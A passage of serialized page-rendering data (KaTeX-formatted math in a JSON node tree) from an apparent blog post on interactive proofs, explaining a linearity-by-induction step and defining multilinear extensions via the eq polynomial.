className":114178},[246],[114180],{"type":26,"tag":137,"props":114181,"children":114183},{"className":114182,"style":464},[251],[114184],{"type":26,"tag":137,"props":114185,"children":114186},{},[],{"type":26,"tag":137,"props":114188,"children":114190},{"className":114189,"style":281},[184],[],{"type":26,"tag":137,"props":114192,"children":114194},{"className":114193},[286],[114195],{"type":32,"value":289},{"type":26,"tag":137,"props":114197,"children":114199},{"className":114198,"style":281},[184],[],{"type":26,"tag":137,"props":114201,"children":114203},{"className":114202},[151],[114204,114208,114213,114218,114223,114227,114232],{"type":26,"tag":137,"props":114205,"children":114207},{"className":114206,"style":157},[156],[],{"type":26,"tag":137,"props":114209,"children":114211},{"className":114210},[169,170],[114212],{"type":32,"value":41},{"type":26,"tag":137,"props":114214,"children":114216},{"className":114215},[162],[114217],{"type":32,"value":165},{"type":26,"tag":137,"props":114219,"children":114221},{"className":114220},[169],[114222],{"type":32,"value":878},{"type":26,"tag":137,"props":114224,"children":114226},{"className":114225,"style":348},[184],[],{"type":26,"tag":137,"props":114228,"children":114230},{"className":114229},[353],[114231],{"type":32,"value":1935},{"type":26,"tag":137,"props":114233,"children":114235},{"className":114234,"style":348},[184],[],{"type":26,"tag":137,"props":114237,"children":114239},{"className":114238},[151],[114240,114244,114249,114306,114311,114315,114320],{"type":26,"tag":137,"props":114241,"children":114243},{"className":114242,"style":157},[156],[],{"type":26,"tag":137,"props":114245,"children":114247},{"className":114246},[169],[114248],{"type":32,"value":277},{"type":26,"tag":137,"props":114250,"children":114252},{"className":114251},[169],[114253,114258],{"type":26,"tag":137,"props":114254,"children":114256},{"className":114255,"style":621},[169,170],[114257],{"type":32,"value":624},{"type":26,"tag":137,"props":114259,"children":114261},{"className":114260},[236],[114262],{"type":26,"tag":137,"props":114263,"children":114265},{"className":114264},[241,417],[114266,114295],{"type":26,"tag":137,"props":114267,"children":114269},{"className":114268},[246],[114270,114290],{"type":26,"tag":137,"props":114271,"children":114273},{"className":114272,"style":556},[251],[114274],{"type":26,"tag":137,"props":114275,"children":114276},{"style":643},[114277,114281],{"type":26,"tag":137,"props":114278,"children":114280},{"className":114279,"style":262},[261],[],{"type":26,"tag":137,"props":114282,"children":114284},{"className":114283},[267,268,269,270],[114285],{"type":26,"tag":137,"props":114286,"children":114288},{"className":114287},[169,170,270],[114289],{"type":32,"value":506},{"type":26,"tag":137,"props":114291,"children":114293},{"className":114292},[453],[114294],{"type":32,"value":456},{"type":26,"tag":137,"props":114296,"children":114298},{"className":114297},[246],[114299],{"type":26,"tag":137,"props":114300,"children":114302},{"className":114301,"style":464},[251],[114303],{"type":26,"tag":137,"props":114304,"children":114305},{},[],{"type":26,"tag":137,"props":114307,"children":114309},{"className":114308},[197],[114310],{"type":32,"value":200},{"type":26,"tag":137,"props":114312,"children":114314},{"className":114313,"style":348},[184],[],{"type":26,"tag":137,"props":114316,"children":114318},{"className":114317},[353],[114319],{"type":32,"value":356},{"type":26,"tag":137,"props":114321,"children":114323},{"className":114322,"style":348},[184],[],{"type":26,"tag":137,"props":114325,"children":114327},{"className":114326},[151],[114328,114332,114403,114407,114412],{"type":26,"tag":137,"props":114329,"children":114331},{"className":114330,"style":113020},[156],[],{"type":26,"tag":137,"props":114333,"children":114335},{"className":114334},[169],[114336,114341],{"type":26,"tag":137,"props":114337,"children":114339},{"className":114338,"style":1517},[169,170],[114340],{"type":32,"value":1520},{"type":26,"tag":137,"props":114342,"children":114344},{"className":114343},[236],[114345],{"type":26,"tag":137,"props":114346,"children":114348},{"className":114347},[241,417],[114349,114392],{"type":26,"tag":137,"props":114350,"children":114352},{"className":114351},[246],[114353,114387],{"type":26,"tag":137,"props":114354,"children":114356},{"className":114355,"style":556},[251],[114357],{"type":26,"tag":137,"props":114358,"children":114359},{"style":113049},[114360,114364],{"type":26,"tag":137,"props":114361,"children":114363},{"className":114362,"style":262},[261],[],{"type":26,"tag":137,"props":114365,"children":114367},{"className":114366},[267,268,269,270],[114368],{"type":26,"tag":137,"props":114369,"children":114371},{"className":114370},[169,270],[114372,114377,114382],{"type":26,"tag":137,"props":114373,"children":114375},{"className":114374},[169,170,270],[114376],{"type":32,"value":506},{"type":26,"tag":137,"props":114378,"children":114380},{"className":114379},[353,270],[114381],{"type":32,"value":1935},{"type":26,"tag":137,"props":114383,"children":114385},{"className":114384},[169,270],[114386],{"type":32,"value":878},{"type":26,"tag":137,"props":114388,"children":114390},{"className":114389},[453],[114391],{"type":32,"value":456},{"type":26,"tag":137,"props":114393,"children":114395},{"className":114394},[246],[114396],{"type":26,"tag":137,"props":114397,"children":114399},{"className":114398,"style":113090},[251],[114400],{"type":26,"tag":137,"props":114401,"children":114402},{},[],{"type":26,"tag":137,"props":114404,"children":114406},{"className":114405,"style":348},[184],[],{"type":26,"tag":137,"props":114408,"children":114410},{"className":114409},[353],[114411],{"type":32,"value":2172},{"type":26,"tag":137,"props":114413,"children":114415},{"className":114414,"style":348},[184],[],{"type":26,"tag":137,"props":114417,"children":114419},{"className":114418},[151],[114420,114424],{"type":26,"tag":137,"props":114421,"children":114423},{"className":114422,"style":612},[156],[],{"type":26,"tag":137,"props":114425,"children":114427},{"className":114426},[169],[114428,114433],{"type":26,"tag":137,"props":114429,"children":114431},{"className":114430,"style":621},[169,170],[114432],{"type":32,"value":624},{"type":26,"tag":137,"props":114434,"children":114436},{"className":114435},[236],[114437],{"type":26,"tag":137,"props":114438,"children":114440},{"className":114439},[241,417],[114441,114470],{"type":26,"tag":137,"props":114442,"children":114444},{"className":114443},[246],[114445,114465],{"type":26,"tag":137,"props":114446,"children":114448},{"className":114447,"style":556},[251],[114449],{"type":26,"tag":137,"props":114450,"children":114451},{"style":643},[114452,114456],{"type":26,"tag":137,"props":114453,"children":114455},{"className":114454,"style":262},[261],[],{"type":26,"tag":137,"props":114457,"children":114459},{"className":114458},[267,268,269,270],[114460],{"type":26,"tag":137,"props":114461,"children":114463},{"className":114462},[169,170,270],[114464],{"type":32,"value":506},{"type":26,"tag":137,"props":114466,"children":114468},{"className":114467},[453],[114469],{"type":32,"value":456},{"type":26,"tag":137,"props":114471,"children":114473},{"className":114472},[246],[114474],{"type":26,"tag":137,"props":114475,"children":114477},{"className":114476,"style":464},[251],[114478],{"type":26,"tag":137,"props":114479,"children":114480},{},[],{"type":26,"tag":35,"props":114482,"children":114483},{},[114484,114485,114581,114583,114608,114610,114635],{"type":32,"value":48738},{"type":26,"tag":84,"props":114486,"children":114487},{},[114488,114490],{"type":32,"value":114489},"linear in ",{"type":26,"tag":130,"props":114491,"children":114493},{"className":114492},[133,134],[114494],{"type":26,"tag":137,"props":114495,"children":114497},{"className":114496},[140],[114498],{"type":26,"tag":137,"props":114499,"children":114501},{"className":114500,"ariaHidden":146},[145],[114502],{"type":26,"tag":137,"props":114503,"children":114505},{"className":114504},[151],[114506,114510],{"type":26,"tag":137,"props":114507,"children":114509},{"className":114508,"style":113020},[156],[],{"type":26,"tag":137,"props":114511,"children":114513},{"className":114512},[169],[114514,114519],{"type":26,"tag":137,"props":114515,"children":114517},{"className":114516,"style":1517},[169,170],[114518],{"type":32,"value":1520},{"type":26,"tag":137,"props":114520,"children":114522},{"className":114521},[236],[114523],{"type":26,"tag":137,"props":114524,"children":114526},{"className":114525},[241,417],[114527,114570],{"type":26,"tag":137,"props":114528,"children":114530},{"className":114529},[246],[114531,114565],{"type":26,"tag":137,"props":114532,"children":114534},{"className":114533,"style":556},[251],[114535],{"type":26,"tag":137,"props":114536,"children":114537},{"style":113049},[114538,114542],{"type":26,"tag":137,"props":114539,"children":114541},{"className":114540,"style":262},[261],[],{"type":26,"tag":137,"props":114543,"children":114545},{"className":114544},[267,268,269,270],[114546],{"type":26,"tag":137,"props":114547,"children":114549},{"className":114548},[169,270],[114550,114555,114560],{"type":26,"tag":137,"props":114551,"children":114553},{"className":114552},[169,170,270],[114554],{"type":32,"value":506},{"type":26,"tag":137,"props":114556,"children":114558},{"className":114557},[353,270],[114559],{"type":32,"value":1935},{"type":26,"tag":137,"props":114561,"children":114563},{"className":114562},[169,270],[114564],{"type":32,"value":878},{"type":26,"tag":137,"props":114566,"children":114568},{"className":114567},[453],[114569],{"type":32,"value":456},{"type":26,"tag":137,"props":114571,"children":114573},{"className":114572},[246],[114574],{"type":26,"tag":137,"props":114575,"children":114577},{"className":114576,"style":113090},[251],[114578],{"type":26,"tag":137,"props":114579,"children":114580},{},[],{"type":32,"value":114582},"! By induction, the final claim is linear in the original ",{"type":26,"tag":130,"props":114584,"children":114586},{"className":114585},[133,134],[114587],{"type":26,"tag":137,"props":114588,"children":114590},{"className":114589},[140],[114591],{"type":26,"tag":137,"props":114592,"children":114594},{"className":114593,"ariaHidden":146},[145],[114595],{"type":26,"tag":137,"props":114596,"children":114598},{"className":114597},[151],[114599,114603],{"type":26,"tag":137,"props":114600,"children":114602},{"className":114601,"style":1512},[156],[],{"type":26,"tag":137,"props":114604,"children":114606},{"className":114605,"style":1517},[169,170],[114607],{"type":32,"value":1520},{"type":32,"value":114609},". If ",{"type":26,"tag":130,"props":114611,"children":114613},{"className":114612},[133,134],[114614],{"type":26,"tag":137,"props":114615,"children":114617},{"className":114616},[140],[114618],{"type":26,"tag":137,"props":114619,"children":114621},{"className":114620,"ariaHidden":146},[145],[114622],{"type":26,"tag":137,"props":114623,"children":114625},{"className":114624},[151],[114626,114630],{"type":26,"tag":137,"props":114627,"children":114629},{"className":114628,"style":1512},[156],[],{"type":26,"tag":137,"props":114631,"children":114633},{"className":114632,"style":1517},[169,170],[114634],{"type":32,"value":1520},{"type":32,"value":114636}," isn't in the transcript, we can solve for it.",{"type":26,"tag":118,"props":114638,"children":114640},{"id":114639},"multilinear-extensions-mles",[114641],{"type":32,"value":114642},"Multilinear Extensions (MLEs)",{"type":26,"tag":35,"props":114644,"children":114645},{},[114646,114648,114733],{"type":32,"value":114647},"An MLE is just the polynomial view of a table over ",{"type":26,"tag":130,"props":114649,"children":114651},{"className":114650},[133,134],[114652],{"type":26,"tag":137,"props":114653,"children":114655},{"className":114654},[140],[114656],{"type":26,"tag":137,"props":114657,"children":114659},{"className":114658,"ariaHidden":146},[145],[114660],{"type":26,"tag":137,"props":114661,"children":114663},{"className":114662},[151],[114664,114668,114673,114678,114683,114687,114692],{"type":26,"tag":137,"props":114665,"children":114667},{"className":114666,"style":157},[156],[],{"type":26,"tag":137,"props":114669,"children":114671},{"className":114670},[162],[114672],{"type":32,"value":79221},{"type":26,"tag":137,"props":114674,"children":114676},{"className":114675},[169],[114677],{"type":32,"value":1817},{"type":26,"tag":137,"props":114679,"children":114681},{"className":114680},[177],[114682],{"type":32,"value":180},{"type":26,"tag":137,"props":114684,"children":114686},{"className":114685,"style":185},[184],[],{"type":26,"tag":137,"props":114688,"children":114690},{"className":114689},[169],[114691],{"type":32,"value":878},{"type":26,"tag":137,"props":114693,"children":114695},{"className":114694},[197],[114696,114701],{"type":26,"tag":137,"props":114697,"children":114699},{"className":114698},[197],[114700],{"type":32,"value":36736},{"type":26,"tag":137,"props":114702,"children":114704},{"className":114703},[236],[114705],{"type":26,"tag":137,"props":114706,"children":114708},{"className":114707},[241],[114709],{"type":26,"tag":137,"props":114710,"children":114712},{"className":114711},[246],[114713],{"type":26,"tag":137,"props":114714,"children":114716},{"className":114715,"style":1908},[251],[114717],{"type":26,"tag":137,"props":114718,"children":114719},{"style":256},[114720,114724],{"type":26,"tag":137,"props":114721,"children":114723},{"className":114722,"style":262},[261],[],{"type":26,"tag":137,"props":114725,"children":114727},{"className":114726},[267,268,269,270],[114728],{"type":26,"tag":137,"props":114729,"children":114731},{"className":114730},[169,170,270],[114732],{"type":32,"value":1549},{"type":32,"value":114734},": it matches the table on Boolean points and extends it to field points.",{"type":26,"tag":35,"props":114736,"children":114737},{},[114738],{"type":32,"value":114739},"For this post, the only property you need is:",{"type":26,"tag":35,"props":114741,"children":114742},{},[114743],{"type":26,"tag":130,"props":114744,"children":114746},{"className":114745},[133,134],[114747],{"type":26,"tag":137,"props":114748,"children":114750},{"className":114749},[140],[114751],{"type":26,"tag":137,"props":114752,"children":114754},{"className":114753,"ariaHidden":146},[145],[114755,114917,115189],{"type":26,"tag":137,"props":114756,"children":114758},{"className":114757},[151],[114759,114764,114833,114838,114899,114904,114908,114913],{"type":26,"tag":137,"props":114760,"children":114763},{"className":114761,"style":114762},[156],"height:1.1813em;vertical-align:-0.25em;",[],{"type":26,"tag":137,"props":114765,"children":114768},{"className":114766},[169,114767],"accent",[114769],{"type":26,"tag":137,"props":114770,"children":114772},{"className":114771},[241,417],[114773,114821],{"type":26,"tag":137,"props":114774,"children":114776},{"className":114775},[246],[114777,114816],{"type":26,"tag":137,"props":114778,"children":114781},{"className":114779,"style":114780},[251],"height:0.9313em;",[114782,114796],{"type":26,"tag":137,"props":114783,"children":114785},{"style":114784},"top:-3em;",[114786,114791],{"type":26,"tag":137,"props":114787,"children":114790},{"className":114788,"style":114789},[261],"height:3em;",[],{"type":26,"tag":137,"props":114792,"children":114794},{"className":114793,"style":1039},[169,170],[114795],{"type":32,"value":1042},{"type":26,"tag":137,"props":114797,"children":114799},{"style":114798},"top:-3.6134em;",[114800,114804],{"type":26,"tag":137,"props":114801,"children":114803},{"className":114802,"style":114789},[261],[],{"type":26,"tag":137,"props":114805,"children":114809},{"className":114806,"style":114808},[114807],"accent-body","left:-0.0833em;",[114810],{"type":26,"tag":137,"props":114811,"children":114813},{"className":114812},[169],[114814],{"type":32,"value":114815},"~",{"type":26,"tag":137,"props":114817,"children":114819},{"className":114818},[453],[114820],{"type":32,"value":456},{"type":26,"tag":137,"props":114822,"children":114824},{"className":114823},[246],[114825],{"type":26,"tag":137,"props":114826,"children":114829},{"className":114827,"style":114828},[251],"height:0.1944em;",[114830],{"type":26,"tag":137,"props":114831,"children":114832},{},[],{"type":26,"tag":137,"props":114834,"children":114836},{"className":114835},[162],[114837],{"type":32,"value":165},{"type":26,"tag":137,"props":114839,"children":114841},{"className":114840},[169,114767],[114842],{"type":26,"tag":137,"props":114843,"children":114845},{"className":114844},[241],[114846],{"type":26,"tag":137,"props":114847,"children":114849},{"className":114848},[246],[114850],{"type":26,"tag":137,"props":114851,"children":114854},{"className":114852,"style":114853},[251],"height:0.714em;",[114855,114867],{"type":26,"tag":137,"props":114856,"children":114857},{"style":114784},[114858,114862],{"type":26,"tag":137,"props":114859,"children":114861},{"className":114860,"style":114789},[261],[],{"type":26,"tag":137,"props":114863,"children":114865},{"className":114864,"style":621},[169,170],[114866],{"type":32,"value":624},{"type":26,"tag":137,"props":114868,"children":114869},{"style":114784},[114870,114874],{"type":26,"tag":137,"props":114871,"children":114873},{"className":114872,"style":114789},[261],[],{"type":26,"tag":137,"props":114875,"children":114878},{"className":114876,"style":114877},[114807],"left:-0.1799em;",[114879],{"type":26,"tag":137,"props":114880,"children":114884},{"className":114881,"style":114883},[114882],"overlay","height:0.714em;width:0.471em;",[114885],{"type":26,"tag":36869,"props":114886,"children":114893},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},"http://www.w3.org/2000/svg","0.471em","0.714em","width:0.471em","0 0 471 714","xMinYMin",[114894],{"type":26,"tag":114895,"props":114896,"children":114898},"path",{"d":114897},"M377 20c0-5.333 1.833-10 5.5-14S391 0 397 0c4.667 0 8.667 1.667 12 5\n3.333 2.667 6.667 9 10 19 6.667 24.667 20.333 43.667 41 57 7.333 4.667 11\n10.667 11 18 0 6-1 10-3 12s-6.667 5-14 9c-28.667 14.667-53.667 35.667-75 63\n-1.333 1.333-3.167 3.5-5.5 6.5s-4 4.833-5 5.5c-1 .667-2.5 1.333-4.5 2s-4.333 1\n-7 1c-4.667 0-9.167-1.833-13.5-5.5S337 184 337 178c0-12.667 15.667-32.333 47-59\nH213l-171-1c-8.667-6-13-12.333-13-19 0-4.667 4.333-11.333 13-20h359\nc-16-25.333-24-45-24-59z",[],{"type":26,"tag":137,"props":114900,"children":114902},{"className":114901},[197],[114903],{"type":32,"value":200},{"type":26,"tag":137,"props":114905,"children":114907},{"className":114906,"style":281},[184],[],{"type":26,"tag":137,"props":114909,"children":114911},{"className":114910},[286],[114912],{"type":32,"value":289},{"type":26,"tag":137,"props":114914,"children":114916},{"className":114915,"style":281},[184],[],{"type":26,"tag":137,"props":114918,"children":114920},{"className":114919},[151],[114921,114926,115107,115111,115116,115121,115171,115176,115180,115185],{"type":26,"tag":137,"props":114922,"children":114925},{"className":114923,"style":114924},[156],"height:1.4918em;vertical-align:-0.5144em;",[],{"type":26,"tag":137,"props":114927,"children":114929},{"className":114928},[3722],[114930,114935],{"type":26,"tag":137,"props":114931,"children":114933},{"className":114932,"style":3725},[3722,3723,3724],[114934],{"type":32,"value":3728},{"type":26,"tag":137,"props":114936,"children":114938},{"className":114937},[236],[114939],{"type":26,"tag":137,"props":114940,"children":114942},{"className":114941},[241,417],[114943,115095],{"type":26,"tag":137,"props":114944,"children":114946},{"className":114945},[246],[114947,115090],{"type":26,"tag":137,"props":114948,"children":114951},{"className":114949,"style":114950},[251],"height:0.3448em;",[114952],{"type":26,"tag":137,"props":114953,"children":114955},{"style":114954},"top:-2.3606em;margin-left:0em;margin-right:0.05em;",[114956,114960],{"type":26,"tag":137,"props":114957,"children":114959},{"className":114958,"style":262},[261],[],{"type":26,"tag":137,"props":114961,"children":114963},{"className":114962},[267,268,269,270],[114964],{"type":26,"tag":137,"props":114965,"children":114967},{"className":114966},[169,270],[114968,115022,115027,115032,115037,115042,115047],{"type":26,"tag":137,"props":114969,"children":114971},{"className":114970},[169,114767,270],[114972],{"type":26,"tag":137,"props":114973,"children":114975},{"className":114974},[241],[114976],{"type":26,"tag":137,"props":114977,"children":114979},{"className":114978},[246],[114980],{"type":26,"tag":137,"props":114981,"children":114984},{"className":114982,"style":114983},[251],"height:0.9774em;",[114985,114999],{"type":26,"tag":137,"props":114986,"children":114988},{"style":114987},"top:-2.714em;",[114989,114994],{"type":26,"tag":137,"props":114990,"children":114993},{"className":114991,"style":114992},[261],"height:2.714em;",[],{"type":26,"tag":137,"props":114995,"children":114997},{"className":114996},[169,170,270],[114998],{"type":32,"value":2832},{"type":26,"tag":137,"props":115000,"children":115002},{"style":115001},"top:-2.9774em;",[115003,115007],{"type":26,"tag":137,"props":115004,"children":115006},{"className":115005,"style":114992},[261],[],{"type":26,"tag":137,"props":115008,"children":115011},{"className":115009,"style":115010},[114807],"left:-0.2355em;",[115012],{"type":26,"tag":137,"props":115013,"children":115015},{"className":115014,"style":114883},[114882,270],[115016],{"type":26,"tag":36869,"props":115017,"children":115018},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115019],{"type":26,"tag":114895,"props":115020,"children":115021},{"d":114897},[],{"type":26,"tag":137,"props":115023,"children":115025},{"className":115024},[286,270],[115026],{"type":32,"value":24279},{"type":26,"tag":137,"props":115028,"children":115030},{"className":115029},[162,270],[115031],{"type":32,"value":79221},{"type":26,"tag":137,"props":115033,"children":115035},{"className":115034},[169,270],[115036],{"type":32,"value":1817},{"type":26,"tag":137,"props":115038,"children":115040},{"className":115039},[177,270],[115041],{"type":32,"value":180},{"type":26,"tag":137,"props":115043,"children":115045},{"className":115044},[169,270],[115046],{"type":32,"value":878},{"type":26,"tag":137,"props":115048,"children":115050},{"className":115049},[197,270],[115051,115056],{"type":26,"tag":137,"props":115052,"children":115054},{"className":115053},[197,270],[115055],{"type":32,"value":36736},{"type":26,"tag":137,"props":115057,"children":115059},{"className":115058},[236],[115060],{"type":26,"tag":137,"props":115061,"children":115063},{"className":115062},[241],[115064],{"type":26,"tag":137,"props":115065,"children":115067},{"className":115066},[246],[115068],{"type":26,"tag":137,"props":115069,"children":115072},{"className":115070,"style":115071},[251],"height:0.5935em;",[115073],{"type":26,"tag":137,"props":115074,"children":115076},{"style":115075},"top:-2.786em;margin-right:0.0714em;",[115077,115081],{"type":26,"tag":137,"props":115078,"children":115080},{"className":115079,"style":111483},[261],[],{"type":26,"tag":137,"props":115082,"children":115084},{"className":115083},[267,111488,111489,270],[115085],{"type":26,"tag":137,"props":115086,"children":115088},{"className":115087},[169,170,270],[115089],{"type":32,"value":1549},{"type":26,"tag":137,"props":115091,"children":115093},{"className":115092},[453],[115094],{"type":32,"value":456},{"type":26,"tag":137,"props":115096,"children":115098},{"className":115097},[246],[115099],{"type":26,"tag":137,"props":115100,"children":115103},{"className":115101,"style":115102},[251],"height:0.5144em;",[115104],{"type":26,"tag":137,"props":115105,"children":115106},{},[],{"type":26,"tag":137,"props":115108,"children":115110},{"className":115109,"style":185},[184],[],{"type":26,"tag":137,"props":115112,"children":115114},{"className":115113,"style":1039},[169,170],[115115],{"type":32,"value":1042},{"type":26,"tag":137,"props":115117,"children":115119},{"className":115118},[162],[115120],{"type":32,"value":165},{"type":26,"tag":137,"props":115122,"children":115124},{"className":115123},[169,114767],[115125],{"type":26,"tag":137,"props":115126,"children":115128},{"className":115127},[241],[115129],{"type":26,"tag":137,"props":115130,"children":115132},{"className":115131},[246],[115133],{"type":26,"tag":137,"props":115134,"children":115136},{"className":115135,"style":114983},[251],[115137,115149],{"type":26,"tag":137,"props":115138,"children":115139},{"style":114784},[115140,115144],{"type":26,"tag":137,"props":115141,"children":115143},{"className":115142,"style":114789},[261],[],{"type":26,"tag":137,"props":115145,"children":115147},{"className":115146},[169,170],[115148],{"type":32,"value":2832},{"type":26,"tag":137,"props":115150,"children":115152},{"style":115151},"top:-3.2634em;",[115153,115157],{"type":26,"tag":137,"props":115154,"children":115156},{"className":115155,"style":114789},[261],[],{"type":26,"tag":137,"props":115158,"children":115160},{"className":115159,"style":115010},[114807],[115161],{"type":26,"tag":137,"props":115162,"children":115164},{"className":115163,"style":114883},[114882],[115165],{"type":26,"tag":36869,"props":115166,"children":115167},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115168],{"type":26,"tag":114895,"props":115169,"children":115170},{"d":114897},[],{"type":26,"tag":137,"props":115172,"children":115174},{"className":115173},[197],[115175],{"type":32,"value":200},{"type":26,"tag":137,"props":115177,"children":115179},{"className":115178,"style":348},[184],[],{"type":26,"tag":137,"props":115181,"children":115183},{"className":115182},[353],[115184],{"type":32,"value":2172},{"type":26,"tag":137,"props":115186,"children":115188},{"className":115187,"style":348},[184],[],{"type":26,"tag":137,"props":115190,"children":115192},{"className":115191},[151],[115193,115198,115208,115213,115262,115267,115271,115320],{"type":26,"tag":137,"props":115194,"children":115197},{"className":115195,"style":115196},[156],"height:1.2274em;vertical-align:-0.25em;",[],{"type":26,"tag":137,"props":115199,"children":115201},{"className":115200},[169,32],[115202],{"type":26,"tag":137,"props":115203,"children":115205},{"className":115204},[169],[115206],{"type":32,"value":115207},"eq",{"type":26,"tag":137,"props":115209,"children":115211},{"className":115210},[162],[115212],{"type":32,"value":165},{"type":26,"tag":137,"props":115214,"children":115216},{"className":115215},[169,114767],[115217],{"type":26,"tag":137,"props":115218,"children":115220},{"className":115219},[241],[115221],{"type":26,"tag":137,"props":115222,"children":115224},{"className":115223},[246],[115225],{"type":26,"tag":137,"props":115226,"children":115228},{"className":115227,"style":114983},[251],[115229,115241],{"type":26,"tag":137,"props":115230,"children":115231},{"style":114784},[115232,115236],{"type":26,"tag":137,"props":115233,"children":115235},{"className":115234,"style":114789},[261],[],{"type":26,"tag":137,"props":115237,"children":115239},{"className":115238},[169,170],[115240],{"type":32,"value":2832},{"type":26,"tag":137,"props":115242,"children":115243},{"style":115151},[115244,115248],{"type":26,"tag":137,"props":115245,"children":115247},{"className":115246,"style":114789},[261],[],{"type":26,"tag":137,"props":115249,"children":115251},{"className":115250,"style":115010},[114807],[115252],{"type":26,"tag":137,"props":115253,"children":115255},{"className":115254,"style":114883},[114882],[115256],{"type":26,"tag":36869,"props":115257,"children":115258},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115259],{"type":26,"tag":114895,"props":115260,"children":115261},{"d":114897},[],{"type":26,"tag":137,"props":115263,"children":115265},{"className":115264},[177],[115266],{"type":32,"value":180},{"type":26,"tag":137,"props":115268,"children":115270},{"className":115269,"style":185},[184],[],{"type":26,"tag":137,"props":115272,"children":115274},{"className":115273},[169,114767],[115275],{"type":26,"tag":137,"props":115276,"children":115278},{"className":115277},[241],[115279],{"type":26,"tag":137,"props":115280,"children":115282},{"className":115281},[246],[115283],{"type":26,"tag":137,"props":115284,"children":115286},{"className":115285,"style":114853},[251],[115287,115299],{"type":26,"tag":137,"props":115288,"children":115289},{"style":114784},[115290,115294],{"type":26,"tag":137,"props":115291,"children":115293},{"className":115292,"style":114789},[261],[],{"type":26,"tag":137,"props":115295,"children":115297},{"className":115296,"style":621},[169,170],[115298],{"type":32,"value":624},{"type":26,"tag":137,"props":115300,"children":115301},{"style":114784},[115302,115306],{"type":26,"tag":137,"props":115303,"children":115305},{"className":115304,"style":114789},[261],[],{"type":26,"tag":137,"props":115307,"children":115309},{"className":115308,"style":114877},[114807],[115310],{"type":26,"tag":137,"props":115311,"children":115313},{"className":115312,"style":114883},[114882],[115314],{"type":26,"tag":36869,"props":115315,"children":115316},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115317],{"type":26,"tag":114895,"props":115318,"children":115319},{"d":114897},[],{"type":26,"tag":137,"props":115321,"children":115323},{"className":115322},[197],[115324],{"type":32,"value":200},{"type":26,"tag":35,"props":115326,"children":115327},{},[115328,115330,115399,115401,115547,115549,115688,115690,115774],{"type":32,"value":115329},"At a fixed challenge point ",{"type":26,"tag":130,"props":115331,"children":115333},{"className":115332},[133,134],[115334],{"type":26,"tag":137,"props":115335,"children":115337},{"className":115336},[140],[115338],{"type":26,"tag":137,"props":115339,"children":115341},{"className":115340,"ariaHidden":146},[145],[115342],{"type":26,"tag":137,"props":115343,"children":115345},{"className":115344},[151],[115346,115350],{"type":26,"tag":137,"props":115347,"children":115349},{"className":115348,"style":114853},[156],[],{"type":26,"tag":137,"props":115351,"children":115353},{"className":115352},[169,114767],[115354],{"type":26,"tag":137,"props":115355,"children":115357},{"className":115356},[241],[115358],{"type":26,"tag":137,"props":115359,"children":115361},{"className":115360},[246],[115362],{"type":26,"tag":137,"props":115363,"children":115365},{"className":115364,"style":114853},[251],[115366,115378],{"type":26,"tag":137,"props":115367,"children":115368},{"style":114784},[115369,115373],{"type":26,"tag":137,"props":115370,"children":115372},{"className":115371,"style":114789},[261],[],{"type":26,"tag":137,"props":115374,"children":115376},{"className":115375,"style":621},[169,170],[115377],{"type":32,"value":624},{"type":26,"tag":137,"props":115379,"children":115380},{"style":114784},[115381,115385],{"type":26,"tag":137,"props":115382,"children":115384},{"className":115383,"style":114789},[261],[],{"type":26,"tag":137,"props":115386,"children":115388},{"className":115387,"style":114877},[114807],[115389],{"type":26,"tag":137,"props":115390,"children":115392},{"className":115391,"style":114883},[114882],[115393],{"type":26,"tag":36869,"props":115394,"children":115395},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115396],{"type":26,"tag":114895,"props":115397,"children":115398},{"d":114897},[],{"type":32,"value":115400},", the coefficients ",{"type":26,"tag":130,"props":115402,"children":115404},{"className":115403},[133,134],[115405],{"type":26,"tag":137,"props":115406,"children":115408},{"className":115407},[140],[115409],{"type":26,"tag":137,"props":115410,"children":115412},{"className":115411,"ariaHidden":146},[145],[115413],{"type":26,"tag":137,"props":115414,"children":115416},{"className":115415},[151],[115417,115421,115430,115435,115484,115489,115493,115542],{"type":26,"tag":137,"props":115418,"children":115420},{"className":115419,"style":115196},[156],[],{"type":26,"tag":137,"props":115422,"children":115424},{"className":115423},[169,32],[115425],{"type":26,"tag":137,"props":115426,"children":115428},{"className":115427},[169],[115429],{"type":32,"value":115207},{"type":26,"tag":137,"props":115431,"children":115433},{"className":115432},[162],[115434],{"type":32,"value":165},{"type":26,"tag":137,"props":115436,"children":115438},{"className":115437},[169,114767],[115439],{"type":26,"tag":137,"props":115440,"children":115442},{"className":115441},[241],[115443],{"type":26,"tag":137,"props":115444,"children":115446},{"className":115445},[246],[115447],{"type":26,"tag":137,"props":115448,"children":115450},{"className":115449,"style":114983},[251],[115451,115463],{"type":26,"tag":137,"props":115452,"children":115453},{"style":114784},[115454,115458],{"type":26,"tag":137,"props":115455,"children":115457},{"className":115456,"style":114789},[261],[],{"type":26,"tag":137,"props":115459,"children":115461},{"className":115460},[169,170],[115462],{"type":32,"value":2832},{"type":26,"tag":137,"props":115464,"children":115465},{"style":115151},[115466,115470],{"type":26,"tag":137,"props":115467,"children":115469},{"className":115468,"style":114789},[261],[],{"type":26,"tag":137,"props":115471,"children":115473},{"className":115472,"style":115010},[114807],[115474],{"type":26,"tag":137,"props":115475,"children":115477},{"className":115476,"style":114883},[114882],[115478],{"type":26,"tag":36869,"props":115479,"children":115480},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115481],{"type":26,"tag":114895,"props":115482,"children":115483},{"d":114897},[],{"type":26,"tag":137,"props":115485,"children":115487},{"className":115486},[177],[115488],{"type":32,"value":180},{"type":26,"tag":137,"props":115490,"children":115492},{"className":115491,"style":185},[184],[],{"type":26,"tag":137,"props":115494,"children":115496},{"className":115495},[169,114767],[115497],{"type":26,"tag":137,"props":115498,"children":115500},{"className":115499},[241],[115501],{"type":26,"tag":137,"props":115502,"children":115504},{"className":115503},[246],[115505],{"type":26,"tag":137,"props":115506,"children":115508},{"className":115507,"style":114853},[251],[115509,115521],{"type":26,"tag":137,"props":115510,"children":115511},{"style":114784},[115512,115516],{"type":26,"tag":137,"props":115513,"children":115515},{"className":115514,"style":11